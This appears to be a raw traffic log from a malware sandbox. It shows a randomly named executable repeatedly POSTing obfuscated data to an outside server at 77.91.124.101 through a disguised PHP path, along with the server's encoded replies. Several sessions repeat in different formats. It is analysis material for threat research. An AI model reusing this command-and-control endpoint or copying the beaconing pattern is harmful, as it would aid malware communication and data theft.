                                                            Data Ascii: WYXZ^^Z^]WUWUZWZP]XHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8=<;*0;/7*Z7:+ ='%33"T-;">?(->&G''^)7
                                                            Nov 21, 2023 04:48:06.485061884 CET | 405 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            61 | 77.91.124.101 | 80 | 192.168.2.5 | 49775 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:06.802329063 CET | 406 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:07.001066923 CET | 406 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.001455069 CET409OUTData Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
                                                            Nov 21, 2023 04:48:07.205137968 CET | 409 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            61192.168.2.54977577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:06.802329063 CET406OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:07.001066923 CET406INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.001455069 CET409OUTData Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
                                                            Nov 21, 2023 04:48:07.205137968 CET  409                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            62          192.168.2.5    49776        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:07.523130894 CET  410                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:07.720772028 CET  410                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.721007109 CET  413                 OUT        Data Raw: 52 5a 5d 5b 5b 53 5f 5c 5d 57 55 57 55 5b 57 5b 50 5a 58 45 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[S_\]WUWU[W[PZXEVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*-_<;=>+^8&Z7*\?0"Q&-1$ :W-;&]((8.&G''^)3
                                                            Nov 21, 2023 04:48:07.924458981 CET  413                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:07 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            63          192.168.2.5    49777        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:08.237934113 CET  414                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:08.439186096 CET  414                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:08.439804077 CET  417                 OUT        Data Raw: 52 5b 5d 5d 5b 59 5f 5b 5d 57 55 57 55 5b 57 54 50 58 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]][Y_[]WUWU[WTPXX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+.+9?07.4%4!+#.Q&=V'#%.]<,,.&G''^)3
                                                            Nov 21, 2023 04:48:08.642436981 CET  417                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:08 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            64          192.168.2.5    49778        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:08.956479073 CET  418                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.155344963 CET  418                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.155574083 CET  421                 OUT        Data Raw: 52 5f 58 5e 5e 5a 5a 5d 5d 57 55 57 55 59 57 5b 50 5a 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^^ZZ]]WUWUYW[PZXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)[?T>#3\/._#)*+U5'>Q&3-.*+<;];>&G''^)
                                                            Nov 21, 2023 04:48:09.359371901 CET  421                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            65          192.168.2.5    49779        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:09.674050093 CET  422                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.870726109 CET  422                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.871032000 CET  424                 OUT        Data Raw: 52 5a 5d 5b 5b 5e 5f 5a 5d 57 55 57 55 59 57 51 50 5d 58 41 56 5e 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[^_Z]WUWUYWQP]XAV^W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+81<.S*3\8:[7:)0"S'=!'-.(%>/ ,&G''^)
                                                            Nov 21, 2023 04:48:10.072663069 CET  425                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            66          192.168.2.5    49780        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:10.395653963 CET  426                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:10.593367100 CET  426                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:10.593626022 CET  428                 OUT        Data Raw: 57 5c 58 50 5e 5e 5f 5e 5d 57 55 57 55 56 57 55 50 5c 58 44 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP^^_^]WUWUVWUP\XDVUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y+(%^<"R=#\,:^ )Y?=3-.V33&R-;>/8;&G''^)
                                                            Nov 21, 2023 04:48:10.796176910 CET  429                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:10 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            67          192.168.2.5    49781        77.91.124.101   80                C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:11.114900112 CET  430                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.311685085 CET  430                 IN         HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.312056065 CET  432                 OUT        Data Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
                                                            Nov 21, 2023 04:48:11.513534069 CET  433                 IN         HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                                            67          77.91.124.101  80           192.168.2.5     49781             C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp                            kBytes transferred  Direction  Data
                                                            Nov 21, 2023 04:48:11.114900112 CET  430                 OUT        POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.311685085 CET430INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.312056065 CET432OUTData Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
                                                            Nov 21, 2023 04:48:11.513534069 CET433INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6877.91.124.10180192.168.2.549782C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.571331024 CET434OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.769016981 CET434INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.769237995 CET436OUTData Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
                                                            Nov 21, 2023 04:48:11.971777916 CET439INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            68 | 192.168.2.5 | 49782 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:11.571331024 CET | 434 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.769016981 CET | 434 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.769237995 CET | 436 | OUT | Data Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
                                                            Nov 21, 2023 04:48:11.971777916 CET | 439 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            69 | 192.168.2.5 | 49783 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:11.689568043 CET | 434 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.885853052 CET | 436 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.886046886 CET | 438 | OUT | Data Raw: 52 5a 58 51 5e 59 5a 5f 5d 57 55 57 55 5f 57 53 50 52 58 43 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXQ^YZ_]WUWU_WSPRXCVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%_<:*#,72 >)3S'."R0295(?\,>&G''^)#
                                                            Nov 21, 2023 04:48:12.086941957 CET | 439 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
